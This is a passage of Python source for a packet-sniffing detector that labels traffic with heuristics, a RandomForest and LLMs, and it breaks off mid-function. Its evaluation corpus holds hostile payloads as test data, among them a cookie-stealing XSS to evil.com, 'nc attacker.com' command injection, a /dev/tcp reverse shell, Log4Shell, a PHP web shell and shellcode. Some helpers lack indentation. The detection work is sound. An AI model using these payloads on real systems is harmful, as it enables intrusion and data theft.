    summary_str = packet.summary()
    dns_match = re.search(r"DNS Qry b'([^']+)'", summary_str)
    if dns_match:
        dns_query = dns_match.group(1)
        if not self.dns_parser.is_blacklisted(dns_query):
            self.dns_logger.info("DNS Query (fallback): %s", dns_query)
    if packet.haslayer(DNS):
        dns_layer = packet[DNS]
        # qr == 0 marks a query (not a response).
        if dns_layer.qr == 0 and dns_layer.qd is not None:
            try:
                # qd may be a single DNSQR or an iterable of them.
                if isinstance(dns_layer.qd, DNSQR):
                    dns_query = (dns_layer.qd.qname.decode()
                                 if isinstance(dns_layer.qd.qname, bytes)
                                 else dns_layer.qd.qname)
                else:
                    dns_query = ", ".join(
                        q.qname.decode() if isinstance(q.qname, bytes) else q.qname
                        for q in dns_layer.qd
                    )
            except Exception as e:
                dns_query = str(dns_layer.qd)
            self.logger.info("DNS Query (from DNS layer): %s", dns_query)
        # NOTE(review): reconstructed at the haslayer(DNS) level; it may have
        # been inside the qr == 0 branch originally -- confirm.
        try:
            raw_dns_payload = bytes(dns_layer)
            self.dns_parser.parse_dns_payload(raw_dns_payload)
        except Exception as e:
            self.logger.exception("Error processing DNS layer: %s", e)
    # Frames without an Ethernet header stop processing here.
    if packet.haslayer(Ether):
        eth = packet[Ether]
        self.logger.info("Ethernet: src=%s, dst=%s, type=0x%04x", eth.src, eth.dst, eth.type)
    else:
        self.logger.warning("No Ethernet layer found.")
        return
    # NOTE(review): appears unreachable -- packets lacking an IP/IPv6 layer
    # already returned above, and ARP frames normally carry no IP layer.
    if packet.haslayer(ARP):
        arp = packet[ARP]
        self.logger.info("ARP: op=%s, src=%s, dst=%s", arp.op, arp.psrc, arp.pdst)
        return
    if packet.haslayer(IP):
        ip_layer = packet[IP]
        self.logger.info("IPv4: src=%s, dst=%s, ttl=%s, proto=%s",
                         ip_layer.src, ip_layer.dst, ip_layer.ttl, ip_layer.proto)
    elif packet.haslayer(IPv6):
        ip_layer = packet[IPv6]
        self.logger.info("IPv6: src=%s, dst=%s, hlim=%s",
                         ip_layer.src, ip_layer.dst, ip_layer.hlim)
    if packet.haslayer(TCP):
        tcp_layer = packet[TCP]
        self.logger.info("TCP: sport=%s, dport=%s", tcp_layer.sport, tcp_layer.dport)
        app_name, app_details = self.identify_application(tcp_layer.sport, tcp_layer.dport)
        self.logger.info("Identified Application: %s (%s)", app_name, app_details)
        if packet.haslayer(Raw):
            tcp_payload = bytes(packet[Raw].load)
            # Feed the stream reassembler keyed by the 4-tuple + sequence number.
            self._analyze_reassembled_tcp(
                src_ip=ip_layer.src,
                src_port=tcp_layer.sport,
                dst_ip=ip_layer.dst,
                dst_port=tcp_layer.dport,
                tcp_seq=int(tcp_layer.seq),
                payload=tcp_payload,
            )
        # TLS is None when scapy's TLS layer could not be imported.
        if app_name == "HTTPS" or (TLS and packet.haslayer(TLS)):
            if TLS and packet.haslayer(TLS):
                tls_layer = packet[TLS]
                self.logger.info("TLS Record: %s", tls_layer.summary())
                if packet.haslayer(TLSClientHello):
                    client_hello = packet[TLSClientHello]
                    self.logger.info("TLS ClientHello: %s", client_hello.summary())
                    if hasattr(client_hello, 'servernames'):
                        self.logger.info("SNI: %s", client_hello.servernames)
            else:
                # No dissected TLS layer: fall back to the raw-bytes TLS parser.
                if packet.haslayer(Raw):
                    payload = bytes(packet[Raw].load)
                    self.payload_parser.parse_tls_payload(payload)
            # Logged for every HTTPS/TLS packet.
            # NOTE(review): nesting of this keylog check is reconstructed -- confirm.
            keylog = os.getenv("SSLKEYLOGFILE", "")
            if keylog:
                self.logger.info("TLS plaintext decryption can use SSLKEYLOGFILE at: %s", keylog)
            else:
                self.logger.info("TLS inspection limited to metadata (SNI/JA3/cert) unless SSLKEYLOGFILE or interception is configured.")
        else:
            if packet.haslayer(Raw):
                payload = bytes(packet[Raw].load)
                self.parse_payload(packet, app_name, payload)
    elif packet.haslayer(UDP):
        udp_layer = packet[UDP]
        self.logger.info("UDP: sport=%s, dport=%s", udp_layer.sport, udp_layer.dport)
        app_name, app_details = self.identify_application(udp_layer.sport, udp_layer.dport)
        self.logger.info("Identified Application: %s (%s)", app_name, app_details)
        if packet.haslayer(Raw):
            payload = bytes(packet[Raw].load)
            if app_name == "DNS":
                # Record the query for cross-event correlation by source IP.
                parsed_dns = self.protocol_decoder.decode_dns(payload)
                self.correlator.add_event(ip_layer.src, "dns_query", {"query": parsed_dns.get("query", "")})
            self.parse_payload(packet, app_name, payload)
    elif packet.haslayer(ICMP):
        icmp_layer = packet[ICMP]
        self.logger.info("ICMP: type=%s, code=%s", icmp_layer.type, icmp_layer.code)
    else:
        self.logger.warning("Unsupported transport layer.")
def run(self) -> None:
    """Capture on ``self.args.interface`` until the capture ends or Ctrl-C.

    The capture backend is verified first; if it is unusable the error is
    logged and nothing is captured. On exit, pending LLM analyses are drained
    (blocking until the queue is empty) and the total number of packets
    dropped under LLM load is reported.
    """
    self.logger.info("Starting Enhanced Packet Sniffer on interface '%s'", self.args.interface)
    ready, reason = check_packet_capture_backend(logger=self.logger)
    if not ready:
        self.logger.error("%s", reason)
        return
    # Kernel BPF filter: IPv4 only by default; no filter with --local-only.
    # NOTE(review): the "ip" filter keeps IPv6 out of packet_handler's IPv6
    # branches in the default mode -- confirm that is intended.
    capture_filter = "" if self.args.local_only else "ip"
    try:
        sniff(iface=self.args.interface, prn=self.packet_handler, store=0, filter=capture_filter)
    except KeyboardInterrupt:
        self.logger.info("Stopping packet capture (KeyboardInterrupt received)...")
    except Exception as e:
        self.logger.exception("Error during packet capture: %s", e)
    finally:
        llm_queue = self._llm_queue
        if llm_queue is not None:
            outstanding = llm_queue.unfinished_tasks
            if outstanding:
                self.logger.info("Draining %d queued LLM analyses...", outstanding)
                llm_queue.join()
            if self._llm_dropped:
                self.logger.warning("Dropped %d packets total under LLM load.", self._llm_dropped)
def get_llm_labeler(args: argparse.Namespace, logger: Optional[logging.Logger] = None):
    """Build the local (GGUF) LLM labeler selected by *args*.

    Returns None when ``args.llm_backend`` is anything other than "local"
    (the default when the attribute is absent), or when llama-cpp-python is
    not installed (an error is logged in that case).
    """
    log = logger or logging.getLogger(__name__)
    if getattr(args, "llm_backend", "local") != "local":
        return None
    if Llama is None:
        log.error("Local LLM backend requested but llama-cpp-python is not installed. "
                  "Run with --install, or use --llm-backend openai.")
        return None
    # An empty --llm-model-path is normalised to None.
    explicit_path = getattr(args, "llm_model_path", None) or None
    chosen_model = getattr(args, "llm_model", DEFAULT_MODEL_KEY)
    return get_labeler(model_key=chosen_model, model_path=explicit_path, logger=log)
def classify_packet_llm(labeler, backend: str, *, summary: str = "", normalized_payload: str = "",
                        hex_payload: str = "", packet_details: str = "", protocol: str = "",
                        src: str = "", dst: str = "", entropy: Optional[float] = None,
                        logger: Optional[logging.Logger] = None) -> Tuple[int, Dict[str, Any]]:
    """Label one packet as malicious (1) or benign (0) with the chosen LLM backend.

    * ``backend == "local"`` with a labeler: delegate to ``labeler.label`` and
      return its label plus ``to_dict()`` verdict.
    * ``backend == "openai"``: call the OpenAI wrapper; details carry the
      verdict word and backend name.
    * anything else (including "local" with no labeler): ``(0, {"error": ...})``.
    """
    logger = logger or logging.getLogger(__name__)
    if backend == "local" and labeler is not None:
        verdict = labeler.label(
            summary=summary, protocol=protocol, src=src, dst=dst,
            normalized_payload=normalized_payload, hex_payload=hex_payload,
            entropy=entropy,
        )
        return verdict.label, verdict.to_dict()
    if backend != "openai":
        return 0, {"error": "no LLM backend available"}
    is_malicious = llm_label_packet(summary, normalized_payload, hex_payload, packet_details, logger=logger)
    word = "malicious" if is_malicious else "benign"
    return is_malicious, {"verdict": word, "backend": "openai"}
async def async_llm_label_packet(packet_summary: str, normalized_payload: str, hex_payload: str, packet_details: str, logger: Optional[logging.Logger] = None) -> int:
    """Ask the OpenAI chat API whether a packet is malicious.

    Args:
        packet_summary: One-line scapy summary of the packet.
        normalized_payload: Printable payload text (first 300 chars are sent).
        hex_payload: Payload as hex (first 200 chars are sent).
        packet_details: Scapy ``show(dump=True)`` output.
        logger: Optional logger; defaults to this module's logger.

    Returns:
        1 if the model's answer contains "malicious", otherwise 0. A missing
        client or API key, or any API error, is logged and yields 0.
    """
    logger = logger or logging.getLogger(__name__)
    if AsyncOpenAI is None:
        logger.error("AsyncOpenAI client is not available. Please install the openai package (>=1.0.0).")
        return 0
    api_key = os.getenv("OPENAI_API_KEY")
    if not api_key:
        logger.error("OpenAI API key not found in environment (OPENAI_API_KEY).")
        return 0
    xdp_details = get_xdp_metadata_details()
    prompt = (
        f"Examine the following packet details and decide if the packet is malicious or benign.\n\n"
        f"Packet Summary:\n{packet_summary}\n\n"
        f"Packet Detailed Info (Scapy dump):\n{packet_details}\n\n"
        f"Normalized Payload (first 300 characters):\n{normalized_payload[:300]}\n\n"
        f"Hex Payload (first 200 characters):\n{hex_payload[:200]}\n\n"
        f"{xdp_details}\n\n"
        "Answer with a single word: 'malicious' or 'benign'."
    )
    logger.debug("LLM Prompt:\n%s", prompt)
    # Create the client only once the prompt is built, so nothing can fail
    # between creating it and the try/finally that closes it.
    client = AsyncOpenAI(api_key=api_key)
    try:
        response = await client.chat.completions.create(
            model="gpt-3.5-turbo",
            messages=[
                {"role": "system", "content": "You are a network security analyst."},
                {"role": "user", "content": prompt}
            ],
            max_tokens=10,
            temperature=0
        )
        # message.content may be None (e.g. refusals); treat that as an empty answer.
        answer = (response.choices[0].message.content or "").strip().lower()
        logger.debug("LLM response: %s", answer)
        return 1 if "malicious" in answer else 0
    except Exception as e:
        logger.exception("Error querying OpenAI API: %s", e)
        return 0
    finally:
        # Release the client's HTTP connection pool. The synchronous wrapper runs
        # each call on a throwaway event loop, so an unclosed client would leave
        # connections bound to a loop that is about to be closed.
        try:
            await client.close()
        except Exception:
            logger.debug("Failed to close AsyncOpenAI client.", exc_info=True)
def llm_label_packet(packet_summary: str, normalized_payload: str, hex_payload: str, packet_details: str, logger: Optional[logging.Logger] = None) -> int:
    """Synchronous wrapper for async_llm_label_packet.

    Runs the coroutine on a private, freshly created event loop, so it can be
    called from plain (non-async) code. Returns the coroutine's 0/1 label, or 0
    if running it raises. The private loop is always closed afterwards.
    """
    logger = logger or logging.getLogger(__name__)
    new_loop = asyncio.new_event_loop()
    try:
        return new_loop.run_until_complete(
            async_llm_label_packet(packet_summary, normalized_payload, hex_payload, packet_details, logger=logger)
        )
    except Exception as e:
        logger.exception("Error in LLM labeling: %s", e)
        return 0
    finally:
        # Cleanup is best-effort: a failure while shutting down async generators
        # must neither skip close() (leaking the loop) nor escape the documented
        # "return 0 on error" contract.
        try:
            new_loop.run_until_complete(new_loop.shutdown_asyncgens())
        except Exception:
            logger.debug("Failed to shut down async generators on the labeling loop.", exc_info=True)
        finally:
            new_loop.close()
def build_dataset_main(interface: str, num_samples: int, output_path: str, use_llm: bool,
                       logger: Optional[logging.Logger] = None,
                       args: Optional[argparse.Namespace] = None,
                       timeout: Optional[float] = 60) -> None:
    """Capture packets that carry a Raw payload, label them, and save a CSV.

    Each payload is labeled either by the configured LLM backend
    (``use_llm=True``; the local GGUF model by default) or interactively via
    stdin. The CSV has two columns: ``payload`` (hex) and ``label`` (0/1).

    Args:
        interface: Interface to capture on.
        num_samples: Capture stops as soon as this many samples are labeled.
        output_path: Destination CSV (overwritten).
        use_llm: Label with the LLM instead of prompting the user.
        logger: Optional logger; defaults to this module's logger.
        args: Parsed CLI namespace; supplies ``llm_backend`` and model options.
        timeout: Upper bound on capture time in seconds (None = no limit);
            defaults to the previously hard-coded 60 s.
    """
    logger = logger or logging.getLogger(__name__)
    logger.info("Starting dataset capture on interface %s; capturing %d samples.", interface, num_samples)
    samples: List[Dict[str, Any]] = []
    backend = getattr(args, "llm_backend", "local") if args is not None else "local"
    labeler = None
    if use_llm and backend == "local":
        labeler = get_llm_labeler(args, logger=logger) if args is not None else (
            get_labeler(logger=logger) if Llama is not None else None)
        if labeler is not None:
            logger.info("Warming up local LLM for labeling...")
            labeler.warmup()
        else:
            logger.warning("Local LLM labeler unavailable; every packet will be labeled benign (0).")
    # One parser for the whole capture instead of one per packet.
    payload_parser = PayloadParser(logger=logger)

    def packet_callback(packet) -> None:
        # Ignore stragglers once the quota is met, and packets without payload.
        if len(samples) >= num_samples or not packet.haslayer(Raw):
            return
        payload = bytes(packet[Raw].load)
        hex_payload = payload.hex()
        normalized_payload = payload_parser.normalize_payload(payload)
        packet_summary = packet.summary()
        packet_details = packet.show(dump=True) if backend == "openai" else ""
        print("\nPacket captured:")
        print(packet_summary)
        print("Normalized Payload (first 40 characters):", normalized_payload[:40])
        if use_llm:
            label, details = classify_packet_llm(
                labeler, backend, summary=packet_summary,
                normalized_payload=normalized_payload, hex_payload=hex_payload,
                packet_details=packet_details, logger=logger)
            print(f"LLM labeled this packet as: {'malicious' if label == 1 else 'benign'}"
                  + (f" ({details.get('category','')}, conf={details.get('confidence') or 0:.2f})"
                     if details.get('category') else ""))
        else:
            user_input = input("Label this packet as malicious (1) or benign (0) [default=0]: ").strip()
            label = int(user_input) if user_input in ["0", "1"] else 0
        samples.append({"payload": hex_payload, "label": label})
        # Deliberately returns None: scapy prints any non-None value returned by prn.

    # scapy's sniff() does not stop on prn's return value (it only prints it);
    # stop_filter is what ends the capture once enough samples are collected.
    scapy.sniff(iface=interface, prn=packet_callback, store=0, timeout=timeout,
                stop_filter=lambda _pkt: len(samples) >= num_samples)
    if not samples:
        logger.error("No samples were captured.")
        return
    try:
        with open(output_path, "w", newline="", encoding="utf-8") as csvfile:
            writer = csv.DictWriter(csvfile, fieldnames=["payload", "label"])
            writer.writeheader()
            writer.writerows(samples)
        logger.info("Dataset built and saved to %s (%d samples).", output_path, len(samples))
    except Exception as e:
        logger.error("Failed to write dataset to %s: %s", output_path, e)
# ===========================================================================
# ML training + AI evaluation harness (merged in for single-file gist).
# ===========================================================================
@dataclass(frozen=True)
class EvalSample:
    """One labeled example in the built-in evaluation corpus (immutable)."""

    # Field order is the positional constructor order used by eval_corpus().
    name: str  # short identifier, printed when listing misclassifications
    protocol: str  # coarse tag used by detectors, e.g. "http1", "dns", "tls", "smtp", "other"
    payload: bytes  # application payload bytes to classify
    label: int # 1 malicious, 0 benign
    category: str  # attack family for malicious rows (e.g. "sqli", "dga"); "benign" otherwise
def _eb(s: str) -> bytes:
return s.encode("utf-8", "ignore")
def eval_corpus() -> List[EvalSample]:
    """Small labeled ground-truth corpus for evaluating/training the AI layer.

    Returns 38 EvalSample rows: 16 benign followed by 22 malicious. The
    payloads are hand-written literals. run_eval() scores every detector
    against this list, and train_ml_model() trains on it when no CSV is given.
    """
    # --- benign (label 0) ---------------------------------------------------
    benign = [
        EvalSample("http_get_news", "http1",
                   _eb("GET /news/world HTTP/1.1\r\nHost: bbc.co.uk\r\n"
                       "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
                       "Accept: text/html\r\nAccept-Encoding: gzip, deflate\r\n\r\n"), 0, "benign"),
        # NOTE(review): declared Content-Length (47) does not match the 34-byte JSON body.
        EvalSample("http_api_json", "http1",
                   _eb("POST /api/v2/users HTTP/1.1\r\nHost: api.example.com\r\n"
                       "Content-Type: application/json\r\nAuthorization: Bearer eyJhbGc\r\n"
                       "Content-Length: 47\r\n\r\n{\"name\":\"alice\",\"email\":\"a@x.com\"}"), 0, "benign"),
        EvalSample("http_json_response", "http1",
                   _eb("HTTP/1.1 200 OK\r\nContent-Type: application/json\r\nServer: nginx\r\n\r\n"
                       "{\"status\":\"ok\",\"items\":[1,2,3],\"page\":1}"), 0, "benign"),
        EvalSample("http_static_css", "http1",
                   _eb("GET /assets/main.css HTTP/1.1\r\nHost: cdn.site.com\r\n"
                       "Accept: text/css\r\nReferer: https://site.com/\r\n\r\n"), 0, "benign"),
        EvalSample("http_search_query", "http1",
                   _eb("GET /search?q=best+pizza+near+me&lang=en HTTP/1.1\r\n"
                       "Host: www.google.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"), 0, "benign"),
        # DNS rows are summary-style text ("standard query <type> <name>"), not wire format.
        EvalSample("dns_google", "dns", _eb("standard query A www.google.com"), 0, "benign"),
        EvalSample("dns_cdn", "dns", _eb("standard query A fastly.net.cdn.cloudflare.net"), 0, "benign"),
        EvalSample("dns_update", "dns", _eb("standard query A update.microsoft.com"), 0, "benign"),
        EvalSample("dns_aaaa", "dns", _eb("standard query AAAA github.com"), 0, "benign"),
        # TLS record header prefix padded with zero bytes.
        EvalSample("tls_clienthello", "tls",
                   bytes.fromhex("1603010020010000fc0303") + b"\x00" * 40, 0, "benign"),
        EvalSample("smtp_normal", "smtp",
                   _eb("EHLO mail.example.com\r\nMAIL FROM:<bob@example.com>\r\n"
                       "RCPT TO:<alice@corp.com>\r\nDATA\r\nSubject: Lunch?\r\n\r\n"), 0, "benign"),
        EvalSample("http_form_login", "http1",
                   _eb("POST /login HTTP/1.1\r\nHost: shop.com\r\n"
                       "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                       "username=john&password=hunter2&remember=1"), 0, "benign"),
        EvalSample("http_image_get", "http1",
                   _eb("GET /img/logo.png HTTP/1.1\r\nHost: site.com\r\nAccept: image/png\r\n\r\n"), 0, "benign"),
        EvalSample("ntp_like", "other", bytes.fromhex("1b00000000000000") + b"\x00" * 40, 0, "benign"),
        # NOTE(review): chunk size 0x1a (26) vs. a 25-byte chunk body.
        EvalSample("http_chunked_html", "http1",
                   _eb("HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
                       "1a\r\n<html><body>Hello world</\r\n0\r\n\r\n"), 0, "benign"),
        EvalSample("dns_office", "dns", _eb("standard query A outlook.office365.com"), 0, "benign"),
    ]
    # --- malicious (label 1); the last field is the attack category --------
    malicious = [
        EvalSample("sqli_union", "http1",
                   _eb("GET /product?id=1 UNION SELECT username,password FROM users-- HTTP/1.1\r\n"
                       "Host: shop.com\r\n\r\n"), 1, "sqli"),
        EvalSample("sqli_or", "http1",
                   _eb("POST /login HTTP/1.1\r\nHost: site.com\r\n\r\nuser=admin'--&pass=x' OR '1'='1"), 1, "sqli"),
        EvalSample("sqli_blind", "http1",
                   _eb("GET /item?id=1 AND SLEEP(5)-- HTTP/1.1\r\nHost: x.com\r\n\r\n"), 1, "sqli"),
        EvalSample("xss_script", "http1",
                   _eb("GET /search?q=<script>document.location='http://evil.com/c?'+document.cookie</script> "
                       "HTTP/1.1\r\nHost: site.com\r\n\r\n"), 1, "xss"),
        EvalSample("xss_img_onerror", "http1",
                   _eb("POST /comment HTTP/1.1\r\nHost: blog.com\r\n\r\n"
                       "text=<img src=x onerror=alert(document.cookie)>"), 1, "xss"),
        EvalSample("cmd_injection", "http1",
                   _eb("GET /ping?host=8.8.8.8;cat+/etc/passwd HTTP/1.1\r\nHost: router.local\r\n\r\n"),
                   1, "command_injection"),
        EvalSample("cmd_inject_pipe", "http1",
                   _eb("GET /api/exec?cmd=ls|nc+attacker.com+4444 HTTP/1.1\r\nHost: x\r\n\r\n"),
                   1, "command_injection"),
        EvalSample("path_traversal", "http1",
                   _eb("GET /download?file=../../../../etc/passwd HTTP/1.1\r\nHost: files.com\r\n\r\n"),
                   1, "path_traversal"),
        EvalSample("path_traversal_enc", "http1",
                   _eb("GET /static/..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1\r\nHost: x\r\n\r\n"),
                   1, "path_traversal"),
        EvalSample("log4shell", "http1",
                   _eb("GET / HTTP/1.1\r\nHost: site.com\r\n"
                       "User-Agent: ${jndi:ldap://198.51.100.7:1389/Exploit}\r\n\r\n"), 1, "exploit"),
        EvalSample("reverse_shell", "other",
                   _eb("bash -i >& /dev/tcp/198.51.100.9/4444 0>&1"), 1, "command_injection"),
        EvalSample("powershell_enc", "http1",
                   _eb("POST /upload HTTP/1.1\r\nHost: x\r\n\r\npowershell -nop -w hidden -enc "
                       "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAA"), 1, "malware_download"),
        EvalSample("eicar", "http1",
                   _eb("HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
                       "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"),
                   1, "malware_download"),
        # Response body starts with the "MZ" executable magic.
        EvalSample("pe_download", "http1",
                   _eb("HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
                       "Content-Disposition: attachment; filename=invoice.exe\r\n\r\n")
                   + b"MZ\x90\x00\x03" + b"\x00" * 200, 1, "malware_download"),
        # 64-byte 0x90 sled followed by a short x86 byte sequence.
        EvalSample("shellcode_nop", "other",
                   b"\x90" * 64 + b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80",
                   1, "shellcode"),
        EvalSample("dga_domain", "dns", _eb("standard query A kq3v9z7xj1n4plw8d2rmh.biz"), 1, "dga"),
        EvalSample("dga_domain2", "dns", _eb("standard query A xkqwzbvnmpljhgfdsa7392.com"), 1, "dga"),
        EvalSample("webshell_upload", "http1",
                   _eb("POST /uploads/shell.php HTTP/1.1\r\nHost: victim.com\r\n\r\n"
                       "<?php system($_GET['cmd']); ?>"), 1, "command_injection"),
        # Low-variety repeated 4-byte pattern (1600 bytes) after the headers.
        EvalSample("data_exfil", "http1",
                   _eb("POST /collect HTTP/1.1\r\nHost: 198.51.100.23\r\n"
                       "Content-Type: application/octet-stream\r\nContent-Length: 9000\r\n\r\n")
                   + b"\xa3\x7f\x11\xde" * 400, 1, "data_exfil"),
        EvalSample("smb_exploit", "other",
                   b"\xffSMB\x72\x00\x00\x00\x00" + b"\x00" * 8 + b"\xff\xff" + b"\x41" * 40, 1, "exploit"),
        EvalSample("user_agent_sqlmap", "http1",
                   _eb("GET /?id=1 HTTP/1.1\r\nHost: x.com\r\nUser-Agent: sqlmap/1.6.12\r\n\r\n"), 1, "recon_scan"),
        EvalSample("nikto_scan", "http1",
                   _eb("GET /admin.php HTTP/1.1\r\nHost: x.com\r\n"
                       "User-Agent: Mozilla/5.00 (Nikto/2.1.6)\r\n\r\n"), 1, "recon_scan"),
    ]
    return benign + malicious
def train_ml_model(model_output_path: str = "model.pkl", csv_path: str = "",
                   logger: Optional[logging.Logger] = None) -> Optional[dict]:
    """Train the line-rate RandomForest on rich features and save it.

    Training data comes from a sniffer-built CSV (``payload`` = hex string,
    ``label`` = 0/1; a missing ``label`` column means every row is 0) when
    *csv_path* is given, otherwise from the built-in eval_corpus(). CSV rows
    whose payload is not valid hex, or whose label is not an integer, are
    skipped and counted.

    Returns:
        The saved bundle ``{"model", "feature_names", "version": 2}``, or None
        if scikit-learn/joblib are missing, the dataset cannot be read or lacks
        a ``payload`` column, or no usable samples remain.
    """
    logger = logger or logging.getLogger(__name__)
    try:
        from sklearn.ensemble import RandomForestClassifier
        import joblib
    except Exception as e:
        logger.error("scikit-learn/joblib required for training: %s", e)
        return None
    X, y = [], []
    if csv_path:
        try:
            import pandas as pd
            # Force payload to text: with inferred dtypes pandas turns hex such
            # as "0012" into the int 12 (dropping leading zeros -> wrong bytes)
            # and "1e10" into a float (row then fails to parse and is lost).
            df = pd.read_csv(csv_path, dtype={"payload": str})
        except Exception as e:
            logger.error("Failed to load dataset %s: %s", csv_path, e)
            return None
        if "payload" not in df.columns:
            logger.error("Dataset %s has no 'payload' column.", csv_path)
            return None
        has_label = "label" in df.columns
        skipped = 0
        for _, row in df.iterrows():
            try:
                payload = bytes.fromhex(str(row["payload"]))
                # NaN/blank/non-numeric labels used to abort the whole run here.
                label = int(row["label"]) if has_label else 0
            except (TypeError, ValueError, OverflowError):
                skipped += 1
                continue
            X.append(compute_feature_vector(payload))
            y.append(label)
        logger.info("Loaded %d labeled rows from %s", len(y), csv_path)
        if skipped:
            logger.warning("Skipped %d row(s) with a malformed payload or label.", skipped)
    else:
        for s in eval_corpus():
            X.append(compute_feature_vector(s.payload))
            y.append(s.label)
        logger.info("Using built-in corpus: %d samples", len(y))
    if not X:
        logger.error("No valid training samples found.")
        return None
    if len(set(y)) < 2:
        logger.warning("Training data contains a single class (%s); the model cannot discriminate.", y[0])
    X = np.array(X, dtype=float)
    y = np.array(y, dtype=int)
    clf = RandomForestClassifier(n_estimators=200, class_weight="balanced",
                                 random_state=42, n_jobs=-1)
    clf.fit(X, y)
    bundle = {"model": clf, "feature_names": FEATURE_NAMES, "version": 2}
    joblib.dump(bundle, model_output_path)
    logger.info("Saved model -> %s (%d features)", model_output_path, X.shape[1])
    return bundle
def _metrics(y_true: List[int], y_pred: List[int]) -> dict:
tp = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 1)
fp = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 1)
tn = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 0)
fn = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 0)
prec = tp / (tp + fp) if (tp + fp) else 0.0
rec = tp / (tp + fn) if (tp + fn) else 0.0
f1 = 2 * prec * rec / (prec + rec) if (prec + rec) else 0.0
acc = (tp + tn) / len(y_true) if y_true else 0.0
return {"tp": tp, "fp": fp, "tn": tn, "fn": fn,
"precision": prec, "recall": rec, "f1": f1, "accuracy": acc}
def _old_baseline_pred(s: EvalSample) -> int:
    """Legacy detector: 1 for payloads longer than 1000 bytes with entropy above 7.0, else 0."""
    payload = s.payload
    if len(payload) <= 1000:
        # Short payloads never qualify; entropy is not computed for them.
        return 0
    return int(shannon_entropy(payload) > 7.0)
def _heuristic_pred(s: EvalSample) -> int:
    """Rule-based detector used as the "Heuristics" row of run_eval.

    Flags (returns 1) when any of these hold, else returns 0:
      * an ATTACK_TOKENS entry occurs in the lower-cased payload, ignoring the
        over-generic tokens ``;``, ``|``, ``--`` and ``select ``;
      * the payload starts with ``MZ`` or an SMB1/SMB2 magic;
      * it is over 2000 bytes with entropy above 7.3 (first 4 KiB);
      * for DNS rows, some word's first dot-separated label is 14+ bytes
        long with at most two vowels.
    """
    payload = s.payload
    lowered = payload.lower()
    too_generic = (b";", b"|", b"--", b"select ")
    if any(token in lowered and token not in too_generic for token, _ in ATTACK_TOKENS):
        return 1
    if payload[:2] == b"MZ" or payload[:4] in (b"\xfeSMB", b"\xffSMB"):
        return 1
    if len(payload) > 2000 and shannon_entropy(payload[:4096]) > 7.3:
        return 1
    if s.protocol != "dns":
        return 0
    for word in lowered.split():
        first_label = word.split(b".")[0]
        if len(first_label) >= 14 and sum(ch in b"aeiou" for ch in first_label) <= 2:
            return 1
    return 0
def _ml_cv_preds(samples: List[EvalSample]) -> List[int]:
    """Return out-of-fold RandomForest predictions for *samples*.

    Uses 5-fold stratified cross-validation (shuffled, seed 42), so every
    sample is predicted by a model that never saw it during training.
    """
    from sklearn.ensemble import RandomForestClassifier
    from sklearn.model_selection import StratifiedKFold
    features = np.array([compute_feature_vector(sample.payload) for sample in samples], dtype=float)
    labels = np.array([sample.label for sample in samples], dtype=int)
    out_of_fold = np.zeros(len(labels), dtype=int)
    folds = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)
    for train_idx, test_idx in folds.split(features, labels):
        forest = RandomForestClassifier(n_estimators=200, class_weight="balanced",
                                        random_state=42, n_jobs=-1)
        forest.fit(features[train_idx], labels[train_idx])
        out_of_fold[test_idx] = forest.predict(features[test_idx])
    return out_of_fold.tolist()
def run_eval(args: argparse.Namespace, logger: Optional[logging.Logger] = None) -> None:
    """Score OLD/heuristics/ML/LLM + ensembles on the labeled corpus and print a table.

    Rows:
      * the legacy length+entropy baseline;
      * the heuristics;
      * the RandomForest (5-fold CV);
      * the local LLM, skipped when ``args.no_llm`` is set and reported as
        unavailable when the labeler cannot be built;
      * OR-ensembles of those predictions.

    ``args.show_errors`` also lists the LLM's misclassifications.
    """
    logger = logger or logging.getLogger(__name__)
    samples = eval_corpus()
    y = [s.label for s in samples]

    def row(name, m, secs):
        print(f"{name:16s} P={m['precision']:.2f} R={m['recall']:.2f} "
              f"F1={m['f1']:.2f} Acc={m['accuracy']:.2f} "
              f"[TP={m['tp']} FP={m['fp']} TN={m['tn']} FN={m['fn']}] {secs:.1f}s")

    def timed(predict):
        # perf_counter is monotonic; time.time() follows the wall clock and can
        # jump (NTP/clock adjustments), corrupting elapsed-time readings.
        start = time.perf_counter()
        preds = predict()
        return preds, time.perf_counter() - start

    print(f"\nCorpus: {len(samples)} samples ({sum(y)} malicious, {len(y)-sum(y)} benign)\n")
    print(f"{'classifier':16s} precision/recall/F1/accuracy + confusion")
    print("-" * 78)
    p_old, secs = timed(lambda: [_old_baseline_pred(s) for s in samples])
    row("OLD (len+ent)", _metrics(y, p_old), secs)
    p_heur, secs = timed(lambda: [_heuristic_pred(s) for s in samples])
    row("Heuristics", _metrics(y, p_heur), secs)
    p_ml, secs = timed(lambda: _ml_cv_preds(samples))
    row("NEW ML (5-CV)", _metrics(y, p_ml), secs)
    p_llm = None
    if not getattr(args, "no_llm", False):
        labeler = get_llm_labeler(args, logger=logger)
        if labeler is not None and labeler.available:
            start = time.perf_counter()
            p_llm, details = [], []
            for s in samples:
                r = labeler.label(protocol=s.protocol,
                                  normalized_payload=s.payload.decode("utf-8", "replace"),
                                  hex_payload=s.payload.hex(),
                                  entropy=shannon_entropy(s.payload))
                p_llm.append(r.label)
                details.append((s, r))
            row("Local LLM", _metrics(y, p_llm), time.perf_counter() - start)
            if getattr(args, "show_errors", False):
                print("\nLLM misclassifications:")
                for s, r in details:
                    if r.label != s.label:
                        print(f"  {s.name:20s} true={s.label} pred={r.label} "
                              f"({r.verdict} {r.confidence:.2f} {r.category}) {r.reason[:60]}")
        else:
            print(f"{'Local LLM':16s} (unavailable -- install llama-cpp-python)")
    if p_llm:
